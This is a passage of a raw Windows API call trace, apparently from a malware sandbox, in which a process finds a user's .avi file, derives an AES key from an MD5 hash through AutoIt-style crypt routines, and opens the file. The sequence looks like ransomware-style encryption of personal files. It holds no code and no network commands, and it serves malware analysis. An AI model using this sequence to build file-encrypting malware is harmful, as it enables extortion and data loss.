lpString1="8zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="paZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.581] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.581] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0199.581] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.581] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.581] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.582] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.582] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.582] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.582] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.582] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f0b07b0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x6c66c1b0, ftLastAccessTime.dwHighDateTime=0x1d5e6cf, ftLastWriteTime.dwLowDateTime=0x6c66c1b0, ftLastWriteTime.dwHighDateTime=0x1d5e6cf, nFileSizeHigh=0x0, nFileSizeLow=0x4606, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="J9c7.avi", cAlternateFileName="")) returned 0x90ae18 [0199.582] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0199.582] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.582] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.582] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.582] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0199.582] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.582] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0199.582] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.582] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0199.583] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.583] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.583] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.583] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.583] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0199.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.583] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0199.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.584] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0199.584] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.584] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.584] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.584] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.584] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.584] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.584] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.584] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.585] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0199.585] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.585] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.585] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.585] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.585] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.585] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.585] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.585] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.585] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.585] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.585] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.585] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.585] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.585] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.585] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.585] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.585] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.585] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.585] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.586] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0199.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.586] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0199.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.586] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.586] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.586] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.586] CryptHashData (hHash=0x90af58, pbData=0x8df000, dwDataLen=0x19, dwFlags=0x1) returned 1 [0199.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.586] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.586] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.586] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.586] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.586] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.587] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0199.587] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.587] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.587] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.587] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.587] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.587] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.587] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0199.587] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.587] CryptDestroyHash (hHash=0x90af58) returned 1 [0199.587] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.587] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.587] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.587] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.587] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\j9c7.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.588] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.589] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0199.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0199.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0199.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0199.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0199.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0199.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.589] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0199.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0199.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0199.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0199.589] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0199.596] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0199.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0199.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0199.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0199.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0199.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0199.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0199.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0199.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0199.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0199.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0199.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fff18 [0199.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0199.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0199.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0199.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0199.597] RtlAllocateHeap 